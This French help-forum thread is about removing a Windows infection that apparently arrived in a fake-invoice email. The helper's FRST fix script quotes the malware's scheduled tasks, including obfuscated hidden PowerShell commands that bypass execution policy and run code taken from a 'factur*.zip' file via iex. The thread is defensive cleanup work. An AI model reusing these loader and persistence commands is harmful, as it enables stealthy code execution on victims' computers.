Page 1 sur 1

Impossible de trouver le fichier script

Publié : 29 avr. 2019 10:03
par Thalhes
Bonjour,

Alors j'espère d'abord que je crée le sujet au bon endroit :D
Depuis peu, j'ai un pop up de Windows qui s'affiche à l'écran quasiment toutes les 5 min me précisant qu'il est "Impossible de trouver le fichier script suivant C:\user\me\appdata\roaming\4909ED\pUErlkmZ.vbs"

J'ai déjà fait :
- un scan malwarebyte sur le poste en ayant trouvé une dizaine de Menaces dont j'ai supprimé après avoir mis en quarantaine.
- un nettoyage Ccleaner
- un sfc /scannow pour vérifier si les fichiers systèmes ne sont pas corrompus.
et j'ai fait un FRST qui m'a donné du coup 3 fichiers comme indiqué sur le tuto.
Du coup je me permets de les afficher ici afin de savoir ce qui pose problème sur l'ordinateur.
- https://pjjoint.malekal.com/files.php?i ... 12l6f10u12
- https://pjjoint.malekal.com/files.php?i ... 13x11q8s11
- https://pjjoint.malekal.com/files.php?i ... t8j11j7k14

J'ai regardé un peu partout les résolutions qu'il pouvait y avoir, mais est ce que les fichiers script de résolution sont les mêmes pour tous les messages d'erreur dans ce style en changeant juste le chemin du fichier ou bien sont ils tous différent?
En attente de votre retour, merci.

Re: Impossible de trouver le fichier script

Publié : 29 avr. 2019 10:11
par Malekal_morte
Salut,

Ca semble être venu par mail type fausse facture,


Voici la correction à effectuer avec FRST. Tu peux t'aider de cette Voici la correction à effectuer avec FRST. Tu peux t'aider de cette #fix note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.

Code : Tout sélectionner

Start
CloseProcesses:
CreateRestorePoint:
Task: {1A5149C7-FA4A-4DCE-BEFF-49C58F32081A} - System32\Tasks\U4909ED => C:\Users\psalacroup\AppData\Roaming\\pUErlkmZ.vbs [Argument = 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16]
Task: {D48B8084-8B33-4C93-B49C-F8AED4ED4947} - System32\Tasks\AppRunLog => powershell.exe -wiNdowStylE HiDden -exe bypass -file C:\Users\psalacroup\AppData\Roaming\4909ED\6s4gI6XjvKH1lpSIdXO1Ce.ps1
Task: {ECD7B756-55D2-4E55-A26D-35CE5DED534E} - System32\Tasks\AI => C:\WINDOWS\system32\cmd.exe /c powershell -eP bypasS -win Hi"dde"n -c "&{$v=dir c:\users -r -in factur*.zip|select -last 1;$y=gc -LiteralPat $v.fullname;$y[$y.length-1]|iex}"
2019-04-24 16:49 - 2019-03-12 17:48 - 000000000 ____D C:\Users\psalacroup\AppData\Roaming\4909ED.old
2019-04-24 16:07 - 2019-04-24 16:12 - 000000000 ____D C:\Users\psalacroup\AppData\Roaming\ZHP
2019-04-24 16:07 - 2019-04-24 16:10 - 000000880 _____ C:\Users\psalacroup\Desktop\ZHPDiag.lnk
2019-04-24 16:07 - 2019-04-24 16:07 - 000000000 ____D C:\Users\psalacroup\AppData\Local\ZHP
2019-03-15 12:16 - 2019-03-22 19:15 - 002002944 _____ () C:\Users\psalacroup\AppData\Local\atjsiyay.log
2019-03-15 12:16 - 2019-03-15 12:16 - 000000064 _____ () C:\Users\psalacroup\AppData\Local\diajvxuq.log
2019-03-22 22:33 - 2019-04-24 10:25 - 000967600 _____ () C:\Users\psalacroup\AppData\Local\kohytvji.log
2019-03-15 12:16 - 2019-04-24 10:25 - 000000028 _____ () C:\Users\psalacroup\AppData\Local\perlxjqm.log
2019-03-15 12:16 - 2019-03-22 22:33 - 001627232 _____ () C:\Users\psalacroup\AppData\Local\quvytgum.log
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
End
Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.
(L'ordinateur peut redémarrer tout seul, si le rapport de correction ne s'ouvre pas, cherche un fichier fixlog.txt qui se trouve dans le même dossier que FRST)

Re: Impossible de trouver le fichier script

Publié : 29 avr. 2019 15:15
par Thalhes
Aaaah merci beaucoup.
Je n'ai pas eu de message depuis que je l'ai mis en place grâce à vous.

Comment peut on savoir que cela provient d'un mail type fausse facture? :)

Merci.